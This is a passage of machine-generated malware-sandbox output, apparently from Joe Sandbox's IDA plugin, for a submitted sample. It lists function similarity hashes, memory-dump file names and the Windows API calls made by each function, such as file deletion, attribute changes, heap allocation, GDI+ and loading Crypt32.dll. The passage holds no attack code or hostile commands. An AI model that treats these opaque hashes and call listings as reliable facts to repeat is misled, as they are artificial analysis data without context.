                  Similarity
                  • API ID: File$BuffersFlushTime
                  • String ID:
                  • API String ID: 1392018926-0
                  • Opcode ID: 456af0960a0255b062853efc947a078cec7ceb401ad423adb5b26958355e7235
                  • Instruction ID: b7da9d6dca598f12a7ae6fea822df310520bc2196015e0e782e8965629fd7d4a
                  • Opcode Fuzzy Hash: 456af0960a0255b062853efc947a078cec7ceb401ad423adb5b26958355e7235
                  • Instruction Fuzzy Hash: C621D63114824AABC714DE24C451FBBBBE8AF56704F14081DB9C187191D329DA0DDB61
                  APIs
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00A1A4B8
                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A1A4C5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AddressProc__crt_fast_encode_pointer
                  • String ID:
                  • API String ID: 2279764990-0
                  • Opcode ID: c73fba21550afef3b8c2587da9e8d0d6f343f56cee529f72d5f44aa6906325c4
                  • Instruction ID: 04c10e8491f9cb07111bdc5c52cb2991e4be19ef914df758708856de5c538be0
                  • Opcode Fuzzy Hash: c73fba21550afef3b8c2587da9e8d0d6f343f56cee529f72d5f44aa6906325c4
                  • Instruction Fuzzy Hash: E6110A336021305B9F32DF6CEC448EA73A59BA43607164120FD15AB244DA74DCC2C6D2
                  APIs
                  • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,009F9B35,?,?,00000000,?,?,009F8D9C,?), ref: 009F9BC0
                  • GetLastError.KERNEL32 ref: 009F9BCD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ErrorFileLastPointer
                  • String ID:
                  • API String ID: 2976181284-0
                  • Opcode ID: 25498280774cece68f465fa9284553148c3e1958a27c868eba17eaa9838403e1
                  • Instruction ID: 3428bf44d264f1476d51efd54438e1fcd3e37d34bc392f3db284d51ac0d6ed89
                  • Opcode Fuzzy Hash: 25498280774cece68f465fa9284553148c3e1958a27c868eba17eaa9838403e1
                  • Instruction Fuzzy Hash: 4501C83230421D9F8B18CE69AC94B7EB35DAFC5732B14452EFF1687290CA35D8069B21
                  APIs
                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 009F9E76
                  • GetLastError.KERNEL32 ref: 009F9E82
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ErrorFileLastPointer
                  • String ID:
                  • API String ID: 2976181284-0
                  • Opcode ID: 9973f4dfa534d141fdafa0de8ae884d47c76bc07a3888a6fc51f78dedc98692b
                  • Instruction ID: 47ddb09fc407ba3b75d69d1ba1e61db6d0f3c99e6f7170038e52915168281c5d
                  • Opcode Fuzzy Hash: 9973f4dfa534d141fdafa0de8ae884d47c76bc07a3888a6fc51f78dedc98692b
                  • Instruction Fuzzy Hash: E0019E723043085BEB34DE69DC44B7BB6DD9B89324F14493EB246C2680DA35EC4C8710
                  APIs
                  • _free.LIBCMT ref: 00A18627
                    • Part of subcall function 00A18518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A1C13D,00000000,?,00A167E2,?,00000008,?,00A189AD,?,?,?), ref: 00A1854A
                  • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00A30F50,009FCE57,?,?,?,?,?,?), ref: 00A18663
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Heap$AllocAllocate_free
                  • String ID:
                  • API String ID: 2447670028-0
                  • Opcode ID: 57de9b6735d512b23b02dbbba4c2fa8d84c84703d05f42de85ef09f27ad84b8c
                  • Instruction ID: 4a5e36e44f12f80e9d56210727fbf43036b18d1357f1d798ea80502cc94ec1dd
                  • Opcode Fuzzy Hash: 57de9b6735d512b23b02dbbba4c2fa8d84c84703d05f42de85ef09f27ad84b8c
                  • Instruction Fuzzy Hash: 5DF09632201155A6DB312B65AD00FEF776D9FE2BB0F284215F87896191EF3CC8C155A5
                  APIs
                  • GetCurrentProcess.KERNEL32(?,?), ref: 00A00915
                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 00A0091C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Process$AffinityCurrentMask
                  • String ID:
                  • API String ID: 1231390398-0
                  • Opcode ID: b61a76bfc922151c68252efd96e05a95be07c24f4657e5719b2a897a6be32d39
                  • Instruction ID: 5879d49ee831b1ad74f0b7e3b6ef64c4d061ae42eb66d41a2cab3f2fa5dc929d
                  • Opcode Fuzzy Hash: b61a76bfc922151c68252efd96e05a95be07c24f4657e5719b2a897a6be32d39
                  • Instruction Fuzzy Hash: 41E09233A1410DABEF19CBA8AC04EBB73ADEB05390B204179A807D3241F934DE0286B0
                  APIs
                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,009FA27A,?,?,?,009FA113,?,00000001,00000000,?,?), ref: 009FA458
                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,009FA27A,?,?,?,009FA113,?,00000001,00000000,?,?), ref: 009FA489
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 89944ee2108969122f1ce99564c59e45e89c3c628b985151d908d1eb957bc3b6
                  • Instruction ID: 3f48576f6e3a2054d9f0e4ebc114e19546c3181561bdd2e2906678e2e2866fba
                  • Opcode Fuzzy Hash: 89944ee2108969122f1ce99564c59e45e89c3c628b985151d908d1eb957bc3b6
                  • Instruction Fuzzy Hash: 36F0A03124120D7BDF119F61DC05FE9376CBB08385F048061BD8C86161DB768AA9EB60
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ItemText_swprintf
                  • String ID:
                  • API String ID: 3011073432-0
                  • Opcode ID: 72bec995c044356c589757d83ddd903c7a8f7aab469b98ec4a180601d32ed067
                  • Instruction ID: b48d3041f29510eadb4f6f58101b2699e3da91eea6a1872833889ddaabf5859c
                  • Opcode Fuzzy Hash: 72bec995c044356c589757d83ddd903c7a8f7aab469b98ec4a180601d32ed067
                  • Instruction Fuzzy Hash: DBF0EC7350034C7AEB11EBF0AC06FAE376DAB04745F040555B700670E1DA756A514762
                  APIs
                  • DeleteFileW.KERNELBASE(?,?,?,009F984C,?,?,009F9688,?,?,?,?,00A21FA1,000000FF), ref: 009FA13E
                  • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,009F984C,?,?,009F9688,?,?,?,?,00A21FA1,000000FF), ref: 009FA16C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: DeleteFile
                  • String ID:
                  • API String ID: 4033686569-0
                  • Opcode ID: cfb480c7df9291fc3888bb943f74b239b778b5e4191addbd6932793f6e2f4edc
                  • Instruction ID: 5ee4402c384f01b4559d2ea5d03aa5133337d0ac54940d1064389d67836922da
                  • Opcode Fuzzy Hash: cfb480c7df9291fc3888bb943f74b239b778b5e4191addbd6932793f6e2f4edc
                  • Instruction Fuzzy Hash: 8CE0227524420C6BDB109F60DC01FF9376CAB08381F488071BD88C7060DB218D99ABA0
                  APIs
                  • GdiplusShutdown.GDIPLUS(?,?,?,?,00A21FA1,000000FF), ref: 00A0A3D1
                  • OleUninitialize.OLE32(?,?,?,?,00A21FA1,000000FF), ref: 00A0A3D6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: GdiplusShutdownUninitialize
                  • String ID:
                  • API String ID: 3856339756-0
                  • Opcode ID: 32485ef7e6c74b4bdbd70f2ea45ba00d06c96454ca2ce68a98d0f52fed262bc1
                  • Instruction ID: 7892da6e895b59238af9a5b636bc31751a05137248a10e9b6e2c8925f64b575e
                  • Opcode Fuzzy Hash: 32485ef7e6c74b4bdbd70f2ea45ba00d06c96454ca2ce68a98d0f52fed262bc1
                  • Instruction Fuzzy Hash: 24F06572518654EFC710DB9DED05B59FBACFB49B20F04476AF41983760CB786811CB91
                  APIs
                  • GetFileAttributesW.KERNELBASE(?,?,?,009FA189,?,009F76B2,?,?,?,?), ref: 009FA1A5
                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,009FA189,?,009F76B2,?,?,?,?), ref: 009FA1D1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: c043e01d92b3fa4bdf4599992e77982104cf2fcfed711b3fad9e40b5b760e598
                  • Instruction ID: 715349f765b46e3234ee86504d8587982e344c32fe9965bece8a750456f88393
                  • Opcode Fuzzy Hash: c043e01d92b3fa4bdf4599992e77982104cf2fcfed711b3fad9e40b5b760e598
                  • Instruction Fuzzy Hash: ACE0927660412C5BCB20EBA8DC05BF9BB6CAB093E1F0042B1FE48E7690D7709D459BE1
                  APIs
                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A000A0
                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009FEB86,Crypt32.dll,00000000,009FEC0A,?,?,009FEBEC,?,?,?), ref: 00A000C2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: DirectoryLibraryLoadSystem
                  • String ID:
                  • API String ID: 1175261203-0
                  • Opcode ID: 9209e0dd50a7981ddfcf67d2359ca8c163525fe376d9a51c0dea6535ab724692
                  • Instruction ID: d8ca75de223c62aa82a5e017587530d07a39e3c725a30d70117bb5dd72235eb6
                  • Opcode Fuzzy Hash: 9209e0dd50a7981ddfcf67d2359ca8c163525fe376d9a51c0dea6535ab724692
                  • Instruction Fuzzy Hash: B9E0127690511C6ADB21DBA4EC05FE6776CEF0D382F0444A5BA48D3144DA749A848BB0
                  APIs
                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A09B30
                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00A09B37
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: BitmapCreateFromGdipStream
                  • String ID:
                  • API String ID: 1918208029-0
                  • Opcode ID: d8e7e4d0208f24407470156de4c4da18dadd7126adc90280eb4d162b2831da33
                  • Instruction ID: c0e256e598dff65e8b91458be5c78803b8ba70a62d83d88f313b4c838a26ed38
                  • Opcode Fuzzy Hash: d8e7e4d0208f24407470156de4c4da18dadd7126adc90280eb4d162b2831da33
                  • Instruction Fuzzy Hash: 73E0ED7190121CEBCB10DF98E5016DAB7FCEB09321F10845FE89593241D6716E04AB91
                  APIs
                    • Part of subcall function 00A1329A: try_get_function.LIBVCRUNTIME ref: 00A132AF
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A1217A
                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00A12185
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                  • String ID:
                  • API String ID: 806969131-0
                  • Opcode ID: 3e180bbb6652ed33df6448b0e04dadf6590112941cc2c3be5577ad26c2a6defd
                  • Instruction ID: 1825bd33b70355ed4586bff405ba2f6e1062ea14b2f643e6a186c100c0d407a5
                  • Opcode Fuzzy Hash: 3e180bbb6652ed33df6448b0e04dadf6590112941cc2c3be5577ad26c2a6defd
                  • Instruction Fuzzy Hash: EAD0A936244312342C58EBB429423E82355A862BB43E00B46E7208A0D1EE20C4EAA311
                  APIs
                  • DloadLock.DELAYIMP ref: 00A0DC73
                  • DloadProtectSection.DELAYIMP ref: 00A0DC8F
                    • Part of subcall function 00A0DE67: DloadObtainSection.DELAYIMP ref: 00A0DE77
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Dload$Section$LockObtainProtect
                  • String ID:
                  • API String ID: 731663317-0
                  • Opcode ID: 4756ac6924a9d0c69450c0b6daf6613e2d1efd40ac16be459af7829bae8f4818
                  • Instruction ID: 778d6bdb10a5ed3fc7f1eb69a1ac3f2d8070e6249d75d249969ceb8412fc088c
                  • Opcode Fuzzy Hash: 4756ac6924a9d0c69450c0b6daf6613e2d1efd40ac16be459af7829bae8f4818
                  • Instruction Fuzzy Hash: 9ED012765003095FD226EBF4BA4AB2C7370BB05789F640645F505C70E0DFF44883C605
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ItemShowWindow
                  • String ID:
                  • API String ID: 3351165006-0
                  • Opcode ID: dd61f9fcf06d2e775eb6098df5ae0e2bf1cada2dafe8c8cc1d5187c5559e0889
                  • Instruction ID: 0b3f6e7b9dca0c28326235481b550f77e0bdcd7d0d469ca73fc3c29af43f710c
                  • Opcode Fuzzy Hash: dd61f9fcf06d2e775eb6098df5ae0e2bf1cada2dafe8c8cc1d5187c5559e0889
                  • Instruction Fuzzy Hash: 3AC01232058600BECB018BB0DC09E2FBBA8BBA6212F05CA08F2A5C0060C638C010DB11
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 40a3659c75d0ba011fe25ccdd0edc086de71922d04598301ef0ee9cf8826624a
                  • Instruction ID: 05aca3dbf0639837d423f032ee8b61917c9eb0474c58163e945c88fc8a2af205
                  • Opcode Fuzzy Hash: 40a3659c75d0ba011fe25ccdd0edc086de71922d04598301ef0ee9cf8826624a
                  • Instruction Fuzzy Hash: B3C1C330A0424CDFEF15CF68C494BB97BA9EF16310F1844BADE45DB286CB359944CBA1
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: eb0828ac8be012ef1d2adf073a36c12533951a55cf743b6513546f5abb3c2e1b
                  • Instruction ID: 0bbd173bd2b3c39ab94b267f1ef844f27dabfccc0a820b55e63dd0b565ec65d4
                  • Opcode Fuzzy Hash: eb0828ac8be012ef1d2adf073a36c12533951a55cf743b6513546f5abb3c2e1b
                  • Instruction Fuzzy Hash: B771D171504F489EDB25DB30CC51AF7B7E8AF54301F44896EE6AB87282DB356A48DF10
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F8384
                    • Part of subcall function 009F1380: __EH_prolog.LIBCMT ref: 009F1385
                    • Part of subcall function 009F1380: new.LIBCMT ref: 009F13FE
                    • Part of subcall function 009F19A6: __EH_prolog.LIBCMT ref: 009F19AB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 8daf2b977ff66c37dbeae97f4463e17493ae98494a5316fd33f01ae649c635fc
                  • Instruction ID: 8ecf15f9d789f5ad6e35aebdb51548e9c540d4c3ee0b59d1700f4244e8bb37dd
                  • Opcode Fuzzy Hash: 8daf2b977ff66c37dbeae97f4463e17493ae98494a5316fd33f01ae649c635fc
                  • Instruction Fuzzy Hash: 9541A27184065C9ADF20DB60CC55BFAB3ACAF50314F0444EAE68AA74A3DF755AC8DB50
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F1E05
